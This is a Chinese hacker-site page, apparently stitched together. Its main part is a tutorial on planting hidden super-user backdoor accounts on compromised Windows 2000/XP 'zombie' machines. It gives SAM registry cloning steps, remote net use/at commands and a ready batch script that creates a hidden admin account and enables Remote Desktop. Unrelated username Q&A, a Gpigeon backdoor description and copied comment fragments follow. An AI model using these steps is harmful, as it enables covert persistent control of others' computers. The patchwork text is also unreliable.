zm黑客_黑客帝国 zee

hacker|
126

文章目录:

XP如何隐藏超级用户?

一、如何在图形界面建立隐藏的超级用户

图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器: regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点 “权限”来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM 外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:

1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户

net user hacker$ 1234 /add

2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。如图:t001

3、点“权限”以后会弹出如下窗口:t002

点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。

打开键:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"如图:t003

5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将 00000409.reg与hacker.reg合并。如图t004

编辑后的hacker.reg如图:

6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

二、如何在命令行下远程建立隐藏的超级用户

在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有 schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动 schedule服务就行。

对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。

1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)

2、先与肉鸡建立连接,命令为: net use \13.50.97.238\ipc$ "12345678" /user:"administrator

3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at \13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add

建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。

4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at \13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\

/e 是regedit.exe的参数,在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。

5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy \13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg

修改的方法图形界中已经介绍过了,这里就不作介绍了。

6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \13.50.97.238\admin$\system32\hacker1.reg

以上步聚如下图:

7、查看肉鸡时间:net time \13.50.97.238 然后用at命令将用户hacker$删除:

at \13.50.97.238 13:40 net user hacker$ /del

8、验证hacker$是否删除:用

net use \13.50.97.238 /del 断开与肉鸡的连接。

net use \13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。

11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。

12、通过图中1、2、3、可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。

三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?

这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。

但是这里有两个前提:1、先用net use \肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。

2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。

四、利用被禁用的帐户建立隐藏的超级用户:

我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:

1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。

2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序 CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE \肉鸡ip administrator 超级用户密码 hacher hacher密码。

3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:

net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。

4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user \肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。

5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at \肉鸡ip 时间 net user hacker /active:no

6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户 administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的 "C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。

五、注意的几点事项:

1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。

2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。

3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。

4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责

all3389xp.bat是文章全部源代码,功能是:打开xp的3389,建立隐藏帐户。用户名:minmin$,密码:89412

all3389xp.bat:

代码:

echo open xp 3389 by 旻旻

@net user minmin$ 89412 /add

@net localgroup administrators minmin$ /add

@echo Windows Registry Editor Version 5.00 c:\zm2.reg

@echo. c:\zm2.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SPECIALACCOUNTS\USERLIST] c:\zm2.reg

@echo "minmin$"=dword:00000000 c:\zm2.reg

@regedit /s c:\zm2.reg

@del c:\zm2.reg

@echo REGEDIT4 c:\zm.reg

@echo. c:\zm.reg

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] c:\zm.reg

@echo "fdenytsconnections"=dword:00000000 c:\zm.reg

@echo "Tsenabled"=dword:00000001 c:\zm.reg

@regedit /s c:\zm.reg

@del c:\zm.reg

@net start termservice

@shutdown -l

天选姬怎么修改用户名?

在Windows10系统桌面,我们右键点击“此电脑”图标,在弹出菜单中选择“管理”菜单项

接下来在打开的计算机管理窗口中,我们找到“本地用户和组”菜单项。

接下来点击下面的用户菜单项,然后在右侧的窗口中找到当前的用户名

双击后打开该用户的属性窗口,在这里可以修改该用户的名称。

登录名是什么?

用户名,是网络术语之一。就是要登陆(登入、登录、进入等)的帐户名,即在所在网站的识别码 。 可以使用汉字、字母、字码等,如珠穆朗玛峰,zmlmf,12345,等,都作为 用户名。 一般来说,凡是允许用户注册的网站,都会在其主页显著位置上设置“ 注册”标签,让用户申请。只要符合其规定,并在其他用户还没有注册此名时,即可注册;假如该名已经被他人注册,都会给以提示。这种情况下,只能再次申请,直到注册成功。 网络的用户名,最常见的有、E-mail、博客、论坛等。 [编辑本段]Win XP的技巧 一、恢复“开始”菜单中的“用户名” 因为修改了注册表或者通过组策略进行了相关的设置,可以将Windows XP“开始”菜单中的“用户名”删除。如果遇到这种情况,我们可以通过下面的方法来恢复: 在“开始→运行”中键入“Regedit”打开“注册表编辑器”,展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”,接着在右侧的窗口中将“NoUserNameInStartMenu”值(DWord值)设为“0”或者删除它。注销或重新启动计算机后,在“开始”菜单中就可以看到“用户名”了。 二、恢复“开始”菜单中的“我的图片” 在Windows XP“开始”菜单的用户名旁边,一般会显示“我的图片”,但是在应用了某些设置后,该图片就会消失,我们可以通过下面的方法来恢复: 单击“开始→控制面板”,双击“用户账户”,在出现的“用户账户”窗口中单击“更改用户登录或注销的方式”,接着选中“使用欢迎屏幕”复选框,最后单击“应用选项”按钮。在注销或重新启动计算机后,在“开始”菜单中就可以看到“我的图片”了。 三、隐藏欢迎屏幕中的“用户名” 为了防止别人通过欢迎屏幕中的用户名非法登录Windows XP,我们可以这样隐藏用户名: 打开“注册表编辑器”,展开分支“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList”,接着在右侧的窗口中找到要隐藏的用户名(如果没有,就新建一个),并将它的值(DWORD值)设为“0”(设为“1”就表示显示用户名)。注销或重新启动计算机后,欢迎屏幕中就会隐藏该“用户名”了。 四、建立一个隐藏的帐户 害怕别人在控制面板里面找到你的用户名么?试试看这个方法 (在你隐藏的用户后面加一个$): 开始,运行,输入cmd.exe,回车,再输入如下语句: net user abcd$ /add 这样就可以添加一个名字叫abcd的隐藏帐户了,这样的帐户只有用计算机管理里面的用户管理功能才能看到 如果要厉害一点,可以修改一下注册表,克隆一个帐户。这样的话计算机不会多出一个奇怪的用户名,也就不会引起别人的怀疑。 五、把系统默认的 Administrator 的名字改掉 XP 系统默认有一个叫做 Administrator 的用户,如果不改掉其用户名,则很容易被黑客扫描到,并且有可能破解出系统的密码。 只要一个简单的操作就可以避免这样的情况:右键点击我的电脑,选择管理,打开计算机管理窗口。在左窗格中定位到本地用户和组,右窗格中双击用户进入本机的用户列表。找到 Administrator ,右键单击给它重命名就可以了。比如将 Administrator 重命名成 Guest...(在这之前你必须对原有的 Guest 用户重命名) 这样绝对会让黑客看得一愣一愣的。你的系统安全也就得到了保障。 参考资料:百度百科

用户名怎么填

用户名可以使用汉字、字母、字码等,如珠穆朗玛峰,zmlmf,12345,等,

登录的帐户名,即在所在网站的识别码 。作为用户名。一般来说,凡是允许用户注册的网站,都会在其主页显著位置上设置“ 注册”标签,让用户申请。只要符合其规定,并在其他用户还没有注册此名时,即可注册;假如该名已经被他人注册,都会给以提示。这种情况下,只能再次申请,直到注册成功。网络的用户名,最常见的有QQ、E-mail、博客、论坛等。

扩展资料:

为了防止别人通过欢迎屏幕中的用户名非法登录Windows XP,我们可以这样隐藏用户名:

打开“注册表编辑器”,展开分支“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList”,接着在右侧的窗口中找到要隐藏的用户名(如果没有,就新建一个),并将它的值设为“0”(设为“1”就表示显示用户名)。注销或重新启动计算机后,欢迎屏幕中就会隐藏该“用户名”了。

pc和zm哪个有风险

ZM有风险,

这是一种计算机系统的病毒。“灰鸽子变种ZM(Backdoor.Win32.Gpigeon2008.zm)”病毒:警惕程度★★★,后门病毒,通过网络传播,依赖系统:WindowsNT/2000/XP/2003。该病毒运行时会首先将自身拷贝到系统目录下,并设置成隐藏、系统、只读属性。然后病毒会创建系统服务,实现随系统自启动。它还会新建IE进程并设置该进程为隐藏,然后将病毒自身插入该进程中。通过在后台记录用户键盘操作,病毒会偷取用户信息和本地系统信息等,并将该信息发送给黑客。如此用户计算机将被远程控制,不自主地删除文件,远程下载上传文件,修改注册表等等,给用户的计算机和隐私安全带来很大隐患。

5条大神的评论

  • avatar
    访客 2023-02-06 上午 09:09:52

    理器却能看到这个用户。4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值:at \13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE

  • avatar
    访客 2023-02-06 上午 09:57:07

    38 然后用at命令将用户hacker$删除:at \13.50.97.238 13:40 net user hacker$ /del8、验证hacker$是否删除:用net use \13.50.97.238 /del 断开与肉鸡的连接。net use \13.50.9

  • avatar
    访客 2023-02-06 下午 01:21:41

    edit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点 “权限”来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的

  • avatar
    访客 2023-02-06 上午 09:48:06

    $ /del7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHI

  • avatar
    访客 2023-02-06 下午 12:42:53

    l都可以,这时你只要输入命令:net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hache

发表评论